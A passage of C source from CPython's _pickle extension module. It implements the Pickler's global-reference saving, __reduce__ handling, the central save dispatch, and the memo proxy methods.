"_compat_pickle.REVERSE_NAME_MAPPING values "
"should be 2-tuples, not %.200s",
Py_TYPE(item)->tp_name);
return -1;
}
fixed_module_name = PyTuple_GET_ITEM(item, 0);
fixed_global_name = PyTuple_GET_ITEM(item, 1);
if (!PyUnicode_Check(fixed_module_name) ||
!PyUnicode_Check(fixed_global_name)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_NAME_MAPPING values "
"should be pairs of str, not (%.200s, %.200s)",
Py_TYPE(fixed_module_name)->tp_name,
Py_TYPE(fixed_global_name)->tp_name);
return -1;
}
Py_CLEAR(*module_name);
Py_CLEAR(*global_name);
Py_INCREF(fixed_module_name);
Py_INCREF(fixed_global_name);
*module_name = fixed_module_name;
*global_name = fixed_global_name;
return 0;
}
else if (PyErr_Occurred()) {
return -1;
}
item = PyDict_GetItemWithError(st->import_mapping_3to2, *module_name);
if (item) {
if (!PyUnicode_Check(item)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.REVERSE_IMPORT_MAPPING values "
"should be strings, not %.200s",
Py_TYPE(item)->tp_name);
return -1;
}
Py_INCREF(item);
Py_XSETREF(*module_name, item);
}
else if (PyErr_Occurred()) {
return -1;
}
return 0;
}
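/* Pickle a "global" (a class, function or other module-level object) by
reference: determine its module and qualified name, verify that importing
that name yields the very same object, then emit an EXT*, STACK_GLOBAL or
GLOBAL opcode as appropriate for the protocol (or a getattr-based reduce
for nested attributes on protocols older than 4). */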
static int
save_global(PicklerObject *self, PyObject *obj, PyObject *name)
{
PyObject *global_name = NULL;
PyObject *module_name = NULL;
PyObject *module = NULL;
PyObject *parent = NULL;
PyObject *dotted_path = NULL;
PyObject *lastname = NULL;
PyObject *cls;
PickleState *st = _Pickle_GetGlobalState();
int status = 0;
_Py_IDENTIFIER(__name__);
_Py_IDENTIFIER(__qualname__);
const char global_op = GLOBAL;
if (name) {
Py_INCREF(name);
global_name = name;
}
else {
if (_PyObject_LookupAttrId(obj, &PyId___qualname__, &global_name) < 0)
goto error;
if (global_name == NULL) {
global_name = _PyObject_GetAttrId(obj, &PyId___name__);
if (global_name == NULL)
goto error;
}
}
dotted_path = get_dotted_path(module, global_name);
if (dotted_path == NULL)
goto error;
module_name = whichmodule(obj, dotted_path);
if (module_name == NULL)
goto error;
/* XXX: Change to use the import C API directly with level=0 to disallow
relative imports.
XXX: PyImport_ImportModuleLevel could be used. However, this bypasses
builtins.__import__. Therefore, _pickle, unlike pickle.py, will ignore
custom import functions (IMHO, this would be a nice security
feature). The import C API would need to be extended to support the
extra parameters of __import__ to fix that. */
module = PyImport_Import(module_name);
if (module == NULL) {
PyErr_Format(st->PicklingError,
"Can't pickle %R: import of module %R failed",
obj, module_name);
goto error;
}
lastname = PyList_GET_ITEM(dotted_path, PyList_GET_SIZE(dotted_path)-1);
Py_INCREF(lastname);
cls = get_deep_attribute(module, dotted_path, &parent);
Py_CLEAR(dotted_path);
if (cls == NULL) {
PyErr_Format(st->PicklingError,
"Can't pickle %R: attribute lookup %S on %S failed",
obj, global_name, module_name);
goto error;
}
if (cls != obj) {
Py_DECREF(cls);
PyErr_Format(st->PicklingError,
"Can't pickle %R: it's not the same object as %S.%S",
obj, module_name, global_name);
goto error;
}
Py_DECREF(cls);
if (self->proto >= 2) {
/* See whether this is in the extension registry, and if
* so generate an EXT opcode.
*/
PyObject *extension_key;
PyObject *code_obj; /* extension code as Python object */
long code; /* extension code as C value */
char pdata[5];
Py_ssize_t n;
extension_key = PyTuple_Pack(2, module_name, global_name);
if (extension_key == NULL) {
goto error;
}
code_obj = PyDict_GetItemWithError(st->extension_registry,
extension_key);
Py_DECREF(extension_key);
/* The object is not registered in the extension registry.
This is the most likely code path. */
if (code_obj == NULL) {
if (PyErr_Occurred()) {
goto error;
}
goto gen_global;
}
/* XXX: pickle.py checks neither the type nor the range of the value
returned by the extension_registry. It should, for consistency. */
/* Verify code_obj has the right type and value. */
if (!PyLong_Check(code_obj)) {
PyErr_Format(st->PicklingError,
"Can't pickle %R: extension code %R isn't an integer",
obj, code_obj);
goto error;
}
code = PyLong_AS_LONG(code_obj);
if (code <= 0 || code > 0x7fffffffL) {
if (!PyErr_Occurred())
PyErr_Format(st->PicklingError, "Can't pickle %R: extension "
"code %ld is out of range", obj, code);
goto error;
}
/* Generate an EXT opcode. */
if (code <= 0xff) {
pdata[0] = EXT1;
pdata[1] = (unsigned char)code;
n = 2;
}
else if (code <= 0xffff) {
pdata[0] = EXT2;
pdata[1] = (unsigned char)(code & 0xff);
pdata[2] = (unsigned char)((code >> 8) & 0xff);
n = 3;
}
else {
pdata[0] = EXT4;
pdata[1] = (unsigned char)(code & 0xff);
pdata[2] = (unsigned char)((code >> 8) & 0xff);
pdata[3] = (unsigned char)((code >> 16) & 0xff);
pdata[4] = (unsigned char)((code >> 24) & 0xff);
n = 5;
}
if (_Pickler_Write(self, pdata, n) < 0)
goto error;
}
else {
gen_global:
if (parent == module) {
Py_INCREF(lastname);
Py_DECREF(global_name);
global_name = lastname;
}
if (self->proto >= 4) {
const char stack_global_op = STACK_GLOBAL;
if (save(self, module_name, 0) < 0)
goto error;
if (save(self, global_name, 0) < 0)
goto error;
if (_Pickler_Write(self, &stack_global_op, 1) < 0)
goto error;
}
else if (parent != module) {
PickleState *st = _Pickle_GetGlobalState();
PyObject *reduce_value = Py_BuildValue("(O(OO))",
st->getattr, parent, lastname);
if (reduce_value == NULL)
goto error;
status = save_reduce(self, reduce_value, NULL);
Py_DECREF(reduce_value);
if (status < 0)
goto error;
}
else {
/* Generate a normal global opcode if we are using a pickle
protocol < 4, or if the object is not registered in the
extension registry. */
PyObject *encoded;
PyObject *(*unicode_encoder)(PyObject *);
if (_Pickler_Write(self, &global_op, 1) < 0)
goto error;
/* For protocol < 3, unless the user asked us not to (fix_imports is
false), we convert module names to the old Python 2.x module names. */
if (self->proto < 3 && self->fix_imports) {
if (fix_imports(&module_name, &global_name) < 0) {
goto error;
}
}
/* Since Python 3.0 supports non-ASCII identifiers, we encode both the
module name and the global name using UTF-8 when pickling with
protocol 3. For protocols 0-2 we stick to ASCII so that the stream
remains readable by older Unpicklers running on Python 2.x. */
if (self->proto == 3) {
unicode_encoder = PyUnicode_AsUTF8String;
}
else {
unicode_encoder = PyUnicode_AsASCIIString;
}
encoded = unicode_encoder(module_name);
if (encoded == NULL) {
if (PyErr_ExceptionMatches(PyExc_UnicodeEncodeError))
PyErr_Format(st->PicklingError,
"can't pickle module identifier '%S' using "
"pickle protocol %i",
module_name, self->proto);
goto error;
}
if (_Pickler_Write(self, PyBytes_AS_STRING(encoded),
PyBytes_GET_SIZE(encoded)) < 0) {
Py_DECREF(encoded);
goto error;
}
Py_DECREF(encoded);
if (_Pickler_Write(self, "\n", 1) < 0)
goto error;
/* Save the qualified name of the global. */
encoded = unicode_encoder(global_name);
if (encoded == NULL) {
if (PyErr_ExceptionMatches(PyExc_UnicodeEncodeError))
PyErr_Format(st->PicklingError,
"can't pickle global identifier '%S' using "
"pickle protocol %i",
global_name, self->proto);
goto error;
}
if (_Pickler_Write(self, PyBytes_AS_STRING(encoded),
PyBytes_GET_SIZE(encoded)) < 0) {
Py_DECREF(encoded);
goto error;
}
Py_DECREF(encoded);
if (_Pickler_Write(self, "\n", 1) < 0)
goto error;
}
/* Memoize the object. */
if (memo_put(self, obj) < 0)
goto error;
}
if (0) {
error:
status = -1;
}
Py_XDECREF(module_name);
Py_XDECREF(global_name);
Py_XDECREF(module);
Py_XDECREF(parent);
Py_XDECREF(dotted_path);
Py_XDECREF(lastname);
return status;
}
static int
save_singleton_type(PicklerObject *self, PyObject *obj, PyObject *singleton)
{
PyObject *reduce_value;
int status;
reduce_value = Py_BuildValue("O(O)", &PyType_Type, singleton);
if (reduce_value == NULL) {
return -1;
}
status = save_reduce(self, reduce_value, obj);
Py_DECREF(reduce_value);
return status;
}
static int
save_type(PicklerObject *self, PyObject *obj)
{
if (obj == (PyObject *)&_PyNone_Type) {
return save_singleton_type(self, obj, Py_None);
}
else if (obj == (PyObject *)&PyEllipsis_Type) {
return save_singleton_type(self, obj, Py_Ellipsis);
}
else if (obj == (PyObject *)&_PyNotImplemented_Type) {
return save_singleton_type(self, obj, Py_NotImplemented);
}
return save_global(self, obj, NULL);
}
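/* Give the persistent_id hook a chance to handle obj. Returns 1 if a
persistent id was written, 0 if the hook declined (returned None), and
-1 on error. */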
static int
save_pers(PicklerObject *self, PyObject *obj)
{
PyObject *pid = NULL;
int status = 0;
const char persid_op = PERSID;
const char binpersid_op = BINPERSID;
pid = call_method(self->pers_func, self->pers_func_self, obj);
if (pid == NULL)
return -1;
if (pid != Py_None) {
if (self->bin) {
if (save(self, pid, 1) < 0 ||
_Pickler_Write(self, &binpersid_op, 1) < 0)
goto error;
}
else {
PyObject *pid_str;
pid_str = PyObject_Str(pid);
if (pid_str == NULL)
goto error;
/* XXX: Should it check whether the pid contains embedded
newlines? */
if (!PyUnicode_IS_ASCII(pid_str)) {
PyErr_SetString(_Pickle_GetGlobalState()->PicklingError,
"persistent IDs in protocol 0 must be "
"ASCII strings");
Py_DECREF(pid_str);
goto error;
}
if (_Pickler_Write(self, &persid_op, 1) < 0 ||
_Pickler_Write(self, PyUnicode_DATA(pid_str),
PyUnicode_GET_LENGTH(pid_str)) < 0 ||
_Pickler_Write(self, "\n", 1) < 0) {
Py_DECREF(pid_str);
goto error;
}
Py_DECREF(pid_str);
}
status = 1;
}
if (0) {
error:
status = -1;
}
Py_XDECREF(pid);
return status;
}
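/* Return a new reference to obj's __class__ attribute, falling back to
Py_TYPE(obj) when the attribute is missing; returns NULL with an
exception set on error. */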
static PyObject *
get_class(PyObject *obj)
{
PyObject *cls;
_Py_IDENTIFIER(__class__);
if (_PyObject_LookupAttrId(obj, &PyId___class__, &cls) == 0) {
cls = (PyObject *) Py_TYPE(obj);
Py_INCREF(cls);
}
return cls;
}
/* We're saving obj, and args is the 2-thru-5 tuple returned by the
* appropriate __reduce__ method for obj.
*/
static int
save_reduce(PicklerObject *self, PyObject *args, PyObject *obj)
{
PyObject *callable;
PyObject *argtup;
PyObject *state = NULL;
PyObject *listitems = Py_None;
PyObject *dictitems = Py_None;
PickleState *st = _Pickle_GetGlobalState();
Py_ssize_t size;
int use_newobj = 0, use_newobj_ex = 0;
const char reduce_op = REDUCE;
const char build_op = BUILD;
const char newobj_op = NEWOBJ;
const char newobj_ex_op = NEWOBJ_EX;
size = PyTuple_Size(args);
if (size < 2 || size > 5) {
PyErr_SetString(st->PicklingError, "tuple returned by "
"__reduce__ must contain 2 through 5 elements");
return -1;
}
if (!PyArg_UnpackTuple(args, "save_reduce", 2, 5,
&callable, &argtup, &state, &listitems, &dictitems))
return -1;
if (!PyCallable_Check(callable)) {
PyErr_SetString(st->PicklingError, "first item of the tuple "
"returned by __reduce__ must be callable");
return -1;
}
if (!PyTuple_Check(argtup)) {
PyErr_SetString(st->PicklingError, "second item of the tuple "
"returned by __reduce__ must be a tuple");
return -1;
}
if (state == Py_None)
state = NULL;
if (listitems == Py_None)
listitems = NULL;
else if (!PyIter_Check(listitems)) {
PyErr_Format(st->PicklingError, "fourth element of the tuple "
"returned by __reduce__ must be an iterator, not %s",
Py_TYPE(listitems)->tp_name);
return -1;
}
if (dictitems == Py_None)
dictitems = NULL;
else if (!PyIter_Check(dictitems)) {
PyErr_Format(st->PicklingError, "fifth element of the tuple "
"returned by __reduce__ must be an iterator, not %s",
Py_TYPE(dictitems)->tp_name);
return -1;
}
if (self->proto >= 2) {
PyObject *name;
_Py_IDENTIFIER(__name__);
if (_PyObject_LookupAttrId(callable, &PyId___name__, &name) < 0) {
return -1;
}
if (name != NULL && PyUnicode_Check(name)) {
_Py_IDENTIFIER(__newobj_ex__);
use_newobj_ex = _PyUnicode_EqualToASCIIId(
name, &PyId___newobj_ex__);
if (!use_newobj_ex) {
_Py_IDENTIFIER(__newobj__);
use_newobj = _PyUnicode_EqualToASCIIId(name, &PyId___newobj__);
}
}
Py_XDECREF(name);
}
if (use_newobj_ex) {
PyObject *cls;
PyObject *args;
PyObject *kwargs;
if (PyTuple_GET_SIZE(argtup) != 3) {
PyErr_Format(st->PicklingError,
"length of the NEWOBJ_EX argument tuple must be "
"exactly 3, not %zd", PyTuple_GET_SIZE(argtup));
return -1;
}
cls = PyTuple_GET_ITEM(argtup, 0);
if (!PyType_Check(cls)) {
PyErr_Format(st->PicklingError,
"first item from NEWOBJ_EX argument tuple must "
"be a class, not %.200s", Py_TYPE(cls)->tp_name);
return -1;
}
args = PyTuple_GET_ITEM(argtup, 1);
if (!PyTuple_Check(args)) {
PyErr_Format(st->PicklingError,
"second item from NEWOBJ_EX argument tuple must "
"be a tuple, not %.200s", Py_TYPE(args)->tp_name);
return -1;
}
kwargs = PyTuple_GET_ITEM(argtup, 2);
if (!PyDict_Check(kwargs)) {
PyErr_Format(st->PicklingError,
"third item from NEWOBJ_EX argument tuple must "
"be a dict, not %.200s", Py_TYPE(kwargs)->tp_name);
return -1;
}
if (self->proto >= 4) {
if (save(self, cls, 0) < 0 ||
save(self, args, 0) < 0 ||
save(self, kwargs, 0) < 0 ||
_Pickler_Write(self, &newobj_ex_op, 1) < 0) {
return -1;
}
}
else {
PyObject *newargs;
PyObject *cls_new;
Py_ssize_t i;
_Py_IDENTIFIER(__new__);
newargs = PyTuple_New(PyTuple_GET_SIZE(args) + 2);
if (newargs == NULL)
return -1;
cls_new = _PyObject_GetAttrId(cls, &PyId___new__);
if (cls_new == NULL) {
Py_DECREF(newargs);
return -1;
}
PyTuple_SET_ITEM(newargs, 0, cls_new);
Py_INCREF(cls);
PyTuple_SET_ITEM(newargs, 1, cls);
for (i = 0; i < PyTuple_GET_SIZE(args); i++) {
PyObject *item = PyTuple_GET_ITEM(args, i);
Py_INCREF(item);
PyTuple_SET_ITEM(newargs, i + 2, item);
}
callable = PyObject_Call(st->partial, newargs, kwargs);
Py_DECREF(newargs);
if (callable == NULL)
return -1;
newargs = PyTuple_New(0);
if (newargs == NULL) {
Py_DECREF(callable);
return -1;
}
if (save(self, callable, 0) < 0 ||
save(self, newargs, 0) < 0 ||
_Pickler_Write(self, &reduce_op, 1) < 0) {
Py_DECREF(newargs);
Py_DECREF(callable);
return -1;
}
Py_DECREF(newargs);
Py_DECREF(callable);
}
}
else if (use_newobj) {
PyObject *cls;
PyObject *newargtup;
PyObject *obj_class;
int p;
/* Sanity checks. */
if (PyTuple_GET_SIZE(argtup) < 1) {
PyErr_SetString(st->PicklingError, "__newobj__ arglist is empty");
return -1;
}
cls = PyTuple_GET_ITEM(argtup, 0);
if (!PyType_Check(cls)) {
PyErr_SetString(st->PicklingError, "args[0] from "
"__newobj__ args is not a type");
return -1;
}
if (obj != NULL) {
obj_class = get_class(obj);
p = obj_class != cls; /* true iff a problem */
Py_DECREF(obj_class);
if (p) {
PyErr_SetString(st->PicklingError, "args[0] from "
"__newobj__ args has the wrong class");
return -1;
}
}
/* XXX: These calls to save() are prone to infinite recursion. Imagine
what happens if the value returned by the __reduce__() method of
some extension type contains another object of the same type. Ouch!
Here is a quick example that I ran into, to illustrate what I
mean:
>>> import pickle, copyreg
>>> copyreg.dispatch_table.pop(complex)
>>> pickle.dumps(1+2j)
Traceback (most recent call last):
...
RecursionError: maximum recursion depth exceeded
Removing the complex class from copyreg.dispatch_table made the
__reduce_ex__() method emit another complex object:
>>> (1+1j).__reduce_ex__(2)
(<function __newobj__ at 0xb7b71c3c>,
(<class 'complex'>, (1+1j)), None, None, None)
Thus when save() was called on newargtup (the 2nd item) recursion
ensued. Of course, the bug was in the complex class, which had a
broken __getnewargs__() that emitted another complex object. But
the point here is that it is quite easy to end up with a broken
reduce function. */
/* Save the class and its __new__ arguments. */
if (save(self, cls, 0) < 0)
return -1;
newargtup = PyTuple_GetSlice(argtup, 1, PyTuple_GET_SIZE(argtup));
if (newargtup == NULL)
return -1;
p = save(self, newargtup, 0);
Py_DECREF(newargtup);
if (p < 0)
return -1;
/* Add NEWOBJ opcode. */
if (_Pickler_Write(self, &newobj_op, 1) < 0)
return -1;
}
else { /* Not using NEWOBJ. */
if (save(self, callable, 0) < 0 ||
save(self, argtup, 0) < 0 ||
_Pickler_Write(self, &reduce_op, 1) < 0)
return -1;
}
/* obj can be NULL when save_reduce() is used directly. A NULL obj means
the caller does not want to memoize the object. Not particularly useful,
but this mimics the behavior of save_reduce() in pickle.py when
obj is None. */
if (obj != NULL) {
/* If the object is already in the memo, this means it is
recursive. In this case, throw away everything we put on the
stack, and fetch the object back from the memo. */
if (PyMemoTable_Get(self->memo, obj)) {
const char pop_op = POP;
if (_Pickler_Write(self, &pop_op, 1) < 0)
return -1;
if (memo_get(self, obj) < 0)
return -1;
return 0;
}
else if (memo_put(self, obj) < 0)
return -1;
}
if (listitems && batch_list(self, listitems) < 0)
return -1;
if (dictitems && batch_dict(self, dictitems) < 0)
return -1;
if (state) {
if (save(self, state, 0) < 0 ||
_Pickler_Write(self, &build_op, 1) < 0)
return -1;
}
return 0;
}
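/* Central dispatch for pickling one object: try the persistent-id hook,
handle atomic and container types with the dedicated save_* routines,
and otherwise obtain a reduce value (from the dispatch tables or the
object's __reduce_ex__/__reduce__ methods) and pass it to save_reduce(). */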
static int
save(PicklerObject *self, PyObject *obj, int pers_save)
{
PyTypeObject *type;
PyObject *reduce_func = NULL;
PyObject *reduce_value = NULL;
int status = 0;
if (_Pickler_OpcodeBoundary(self) < 0)
return -1;
/* The extra pers_save argument is necessary to avoid calling save_pers()
on its returned object. */
if (!pers_save && self->pers_func) {
/* save_pers() returns:
-1 to signal an error;
0 if it did nothing successfully;
1 if a persistent id was saved.
*/
if ((status = save_pers(self, obj)) != 0)
return status;
}
type = Py_TYPE(obj);
/* The old cPickle had an optimization that used switch-case statement
dispatching on the first letter of the type name. This was removed
since benchmarks showed that the optimization was actually slowing
things down. */
/* Atom types; these aren't memoized, so don't check the memo. */
if (obj == Py_None) {
return save_none(self, obj);
}
else if (obj == Py_False || obj == Py_True) {
return save_bool(self, obj);
}
else if (type == &PyLong_Type) {
return save_long(self, obj);
}
else if (type == &PyFloat_Type) {
return save_float(self, obj);
}
/* Check the memo to see if it has the object. If so, generate
a GET (or BINGET) opcode, instead of pickling the object
once again. */
if (PyMemoTable_Get(self->memo, obj)) {
return memo_get(self, obj);
}
if (type == &PyBytes_Type) {
return save_bytes(self, obj);
}
else if (type == &PyUnicode_Type) {
return save_unicode(self, obj);
}
/* We're only calling Py_EnterRecursiveCall here so that atomic
types above are pickled faster. */
if (Py_EnterRecursiveCall(" while pickling an object")) {
return -1;
}
if (type == &PyDict_Type) {
status = save_dict(self, obj);
goto done;
}
else if (type == &PySet_Type) {
status = save_set(self, obj);
goto done;
}
else if (type == &PyFrozenSet_Type) {
status = save_frozenset(self, obj);
goto done;
}
else if (type == &PyList_Type) {
status = save_list(self, obj);
goto done;
}
else if (type == &PyTuple_Type) {
status = save_tuple(self, obj);
goto done;
}
else if (type == &PyType_Type) {
status = save_type(self, obj);
goto done;
}
else if (type == &PyFunction_Type) {
status = save_global(self, obj, NULL);
goto done;
}
/* XXX: This part needs some unit tests. */
/* Get a reduction callable, and call it. This may come from
* self.dispatch_table, copyreg.dispatch_table, the object's
* __reduce_ex__ method, or the object's __reduce__ method.
*/
if (self->dispatch_table == NULL) {
PickleState *st = _Pickle_GetGlobalState();
reduce_func = PyDict_GetItemWithError(st->dispatch_table,
(PyObject *)type);
if (reduce_func == NULL) {
if (PyErr_Occurred()) {
goto error;
}
} else {
/* PyDict_GetItemWithError() returns a borrowed reference.
Increase the reference count to be consistent with
PyObject_GetItem and _PyObject_GetAttrId used below. */
Py_INCREF(reduce_func);
}
} else {
reduce_func = PyObject_GetItem(self->dispatch_table,
(PyObject *)type);
if (reduce_func == NULL) {
if (PyErr_ExceptionMatches(PyExc_KeyError))
PyErr_Clear();
else
goto error;
}
}
if (reduce_func != NULL) {
Py_INCREF(obj);
reduce_value = _Pickle_FastCall(reduce_func, obj);
}
else if (PyType_IsSubtype(type, &PyType_Type)) {
status = save_global(self, obj, NULL);
goto done;
}
else {
_Py_IDENTIFIER(__reduce__);
_Py_IDENTIFIER(__reduce_ex__);
/* XXX: If the __reduce__ method is defined, __reduce_ex__ is
automatically defined as __reduce__. While this is convenient, it
makes it impossible to know which method was actually called. Of
course, this is not a big deal. But still, it would be nice to let
the user know which method was called when something goes
wrong. Incidentally, this means if __reduce_ex__ is not defined, we
don't actually have to check for a __reduce__ method. */
/* Check for a __reduce_ex__ method. */
if (_PyObject_LookupAttrId(obj, &PyId___reduce_ex__, &reduce_func) < 0) {
goto error;
}
if (reduce_func != NULL) {
PyObject *proto;
proto = PyLong_FromLong(self->proto);
if (proto != NULL) {
reduce_value = _Pickle_FastCall(reduce_func, proto);
}
}
else {
PickleState *st = _Pickle_GetGlobalState();
/* Check for a __reduce__ method. */
reduce_func = _PyObject_GetAttrId(obj, &PyId___reduce__);
if (reduce_func != NULL) {
reduce_value = _PyObject_CallNoArg(reduce_func);
}
else {
PyErr_Format(st->PicklingError,
"can't pickle '%.200s' object: %R",
type->tp_name, obj);
goto error;
}
}
}
if (reduce_value == NULL)
goto error;
if (PyUnicode_Check(reduce_value)) {
status = save_global(self, obj, reduce_value);
goto done;
}
if (!PyTuple_Check(reduce_value)) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->PicklingError,
"__reduce__ must return a string or tuple");
goto error;
}
status = save_reduce(self, reduce_value, obj);
if (0) {
error:
status = -1;
}
done:
Py_LeaveRecursiveCall();
Py_XDECREF(reduce_func);
Py_XDECREF(reduce_value);
return status;
}
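/* Entry point used by Pickler.dump(): write the PROTO header for protocol
2+, enable framing for protocol 4+, pickle obj and terminate the stream
with a STOP opcode. */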
static int
dump(PicklerObject *self, PyObject *obj)
{
const char stop_op = STOP;
if (self->proto >= 2) {
char header[2];
header[0] = PROTO;
assert(self->proto >= 0 && self->proto < 256);
header[1] = (unsigned char)self->proto;
if (_Pickler_Write(self, header, 2) < 0)
return -1;
if (self->proto >= 4)
self->framing = 1;
}
if (save(self, obj, 0) < 0 ||
_Pickler_Write(self, &stop_op, 1) < 0 ||
_Pickler_CommitFrame(self) < 0)
return -1;
self->framing = 0;
return 0;
}
/*[clinic input]
_pickle.Pickler.clear_memo
Clears the pickler's "memo".
The memo is the data structure that remembers which objects the
pickler has already seen, so that shared or recursive objects are
pickled by reference and not by value. This method is useful when
re-using picklers.
[clinic start generated code]*/
static PyObject *
_pickle_Pickler_clear_memo_impl(PicklerObject *self)
/*[clinic end generated code: output=8665c8658aaa094b input=01bdad52f3d93e56]*/
{
if (self->memo)
PyMemoTable_Clear(self->memo);
Py_RETURN_NONE;
}
/*[clinic input]
_pickle.Pickler.dump
obj: object
/
Write a pickled representation of the given object to the open file.
[clinic start generated code]*/
static PyObject *
_pickle_Pickler_dump(PicklerObject *self, PyObject *obj)
/*[clinic end generated code: output=87ecad1261e02ac7 input=552eb1c0f52260d9]*/
{
/* Check whether the Pickler was initialized correctly (issue3664).
Developers often forget to call __init__() in their subclasses, which
would trigger a segfault without this check. */
if (self->write == NULL) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_Format(st->PicklingError,
"Pickler.__init__() was not called by %s.__init__()",
Py_TYPE(self)->tp_name);
return NULL;
}
if (_Pickler_ClearBuffer(self) < 0)
return NULL;
if (dump(self, obj) < 0)
return NULL;
if (_Pickler_FlushToFile(self) < 0)
return NULL;
Py_RETURN_NONE;
}
/*[clinic input]
_pickle.Pickler.__sizeof__ -> Py_ssize_t
Returns size in memory, in bytes.
[clinic start generated code]*/
static Py_ssize_t
_pickle_Pickler___sizeof___impl(PicklerObject *self)
/*[clinic end generated code: output=106edb3123f332e1 input=8cbbec9bd5540d42]*/
{
Py_ssize_t res, s;
res = _PyObject_SIZE(Py_TYPE(self));
if (self->memo != NULL) {
res += sizeof(PyMemoTable);
res += self->memo->mt_allocated * sizeof(PyMemoEntry);
}
if (self->output_buffer != NULL) {
s = _PySys_GetSizeOf(self->output_buffer);
if (s == -1)
return -1;
res += s;
}
return res;
}
static struct PyMethodDef Pickler_methods[] = {
_PICKLE_PICKLER_DUMP_METHODDEF
_PICKLE_PICKLER_CLEAR_MEMO_METHODDEF
_PICKLE_PICKLER___SIZEOF___METHODDEF
{NULL, NULL} /* sentinel */
};
static void
Pickler_dealloc(PicklerObject *self)
{
PyObject_GC_UnTrack(self);
Py_XDECREF(self->output_buffer);
Py_XDECREF(self->write);
Py_XDECREF(self->pers_func);
Py_XDECREF(self->dispatch_table);
Py_XDECREF(self->fast_memo);
PyMemoTable_Del(self->memo);
Py_TYPE(self)->tp_free((PyObject *)self);
}
static int
Pickler_traverse(PicklerObject *self, visitproc visit, void *arg)
{
Py_VISIT(self->write);
Py_VISIT(self->pers_func);
Py_VISIT(self->dispatch_table);
Py_VISIT(self->fast_memo);
return 0;
}
static int
Pickler_clear(PicklerObject *self)
{
Py_CLEAR(self->output_buffer);
Py_CLEAR(self->write);
Py_CLEAR(self->pers_func);
Py_CLEAR(self->dispatch_table);
Py_CLEAR(self->fast_memo);
if (self->memo != NULL) {
PyMemoTable *memo = self->memo;
self->memo = NULL;
PyMemoTable_Del(memo);
}
return 0;
}
/*[clinic input]
_pickle.Pickler.__init__
file: object
protocol: object = NULL
fix_imports: bool = True
This takes a binary file for writing a pickle data stream.
The optional *protocol* argument tells the pickler to use the given
protocol; supported protocols are 0, 1, 2, 3 and 4. The default
protocol is 3, a backward-incompatible protocol designed for Python 3.
Specifying a negative protocol version selects the highest protocol
version supported. The higher the protocol used, the more recent the
version of Python needed to read the pickle produced.
The *file* argument must have a write() method that accepts a single
bytes argument. It can thus be a file object opened for binary
writing, an io.BytesIO instance, or any other custom object that meets
this interface.
If *fix_imports* is True and protocol is less than 3, pickle will try
to map the new Python 3 names to the old module names used in Python
2, so that the pickle data stream is readable with Python 2.
[clinic start generated code]*/
static int
_pickle_Pickler___init___impl(PicklerObject *self, PyObject *file,
PyObject *protocol, int fix_imports)
/*[clinic end generated code: output=b5f31078dab17fb0 input=4faabdbc763c2389]*/
{
_Py_IDENTIFIER(persistent_id);
_Py_IDENTIFIER(dispatch_table);
/* In case of multiple __init__() calls, clear previous content. */
if (self->write != NULL)
(void)Pickler_clear(self);
if (_Pickler_SetProtocol(self, protocol, fix_imports) < 0)
return -1;
if (_Pickler_SetOutputStream(self, file) < 0)
return -1;
/* memo and output_buffer may have already been created in _Pickler_New */
if (self->memo == NULL) {
self->memo = PyMemoTable_New();
if (self->memo == NULL)
return -1;
}
self->output_len = 0;
if (self->output_buffer == NULL) {
self->max_output_len = WRITE_BUF_SIZE;
self->output_buffer = PyBytes_FromStringAndSize(NULL,
self->max_output_len);
if (self->output_buffer == NULL)
return -1;
}
self->fast = 0;
self->fast_nesting = 0;
self->fast_memo = NULL;
if (init_method_ref((PyObject *)self, &PyId_persistent_id,
&self->pers_func, &self->pers_func_self) < 0)
{
return -1;
}
if (_PyObject_LookupAttrId((PyObject *)self,
&PyId_dispatch_table, &self->dispatch_table) < 0) {
return -1;
}
return 0;
}
/* Define a proxy object for the Pickler's internal memo object. This is to
* avoid breaking code like:
* pickler.memo.clear()
* and
* pickler.memo = saved_memo
* Is this a good idea? Not really, but we don't want to break code that uses
* it. Note that we don't implement the entire mapping API here. This is
* intentional, as these should be treated as black-box implementation details.
*/
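/* In practice this means Python code such as `pickler.memo = other.memo`
 * keeps working: Pickler_set_memo() below accepts either a PicklerMemoProxy
 * (copying the underlying table) or a dict whose values are 2-item
 * (memo_id, object) tuples. */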
/*[clinic input]
_pickle.PicklerMemoProxy.clear
Remove all items from memo.
[clinic start generated code]*/
static PyObject *
_pickle_PicklerMemoProxy_clear_impl(PicklerMemoProxyObject *self)
/*[clinic end generated code: output=5fb9370d48ae8b05 input=ccc186dacd0f1405]*/
{
if (self->pickler->memo)
PyMemoTable_Clear(self->pickler->memo);
Py_RETURN_NONE;
}
/*[clinic input]
_pickle.PicklerMemoProxy.copy
Copy the memo to a new object.
[clinic start generated code]*/
static PyObject *
_pickle_PicklerMemoProxy_copy_impl(PicklerMemoProxyObject *self)
/*[clinic end generated code: output=bb83a919d29225ef input=b73043485ac30b36]*/
{
Py_ssize_t i;
PyMemoTable *memo;
PyObject *new_memo = PyDict_New();
if (new_memo == NULL)
return NULL;
memo = self->pickler->memo;
for (i = 0; i < memo->mt_allocated; ++i) {
PyMemoEntry entry = memo->mt_table[i];
if (entry.me_key != NULL) {
int status;
PyObject *key, *value;
key = PyLong_FromVoidPtr(entry.me_key);
value = Py_BuildValue("nO", entry.me_value, entry.me_key);
if (key == NULL || value == NULL) {
Py_XDECREF(key);
Py_XDECREF(value);
goto error;
}
status = PyDict_SetItem(new_memo, key, value);
Py_DECREF(key);
Py_DECREF(value);
if (status < 0)
goto error;
}
}
return new_memo;
error:
Py_XDECREF(new_memo);
return NULL;
}
/*[clinic input]
_pickle.PicklerMemoProxy.__reduce__
Implement pickle support.
[clinic start generated code]*/
static PyObject *
_pickle_PicklerMemoProxy___reduce___impl(PicklerMemoProxyObject *self)
/*[clinic end generated code: output=bebba1168863ab1d input=2f7c540e24b7aae4]*/
{
PyObject *reduce_value, *dict_args;
PyObject *contents = _pickle_PicklerMemoProxy_copy_impl(self);
if (contents == NULL)
return NULL;
reduce_value = PyTuple_New(2);
if (reduce_value == NULL) {
Py_DECREF(contents);
return NULL;
}
dict_args = PyTuple_New(1);
if (dict_args == NULL) {
Py_DECREF(contents);
Py_DECREF(reduce_value);
return NULL;
}
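    /* The reduce value built here is (dict, (contents,)), so unpickling a
     * memo proxy reconstructs a plain dict holding the copied memo contents
     * rather than a live proxy object. */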
PyTuple_SET_ITEM(dict_args, 0, contents);
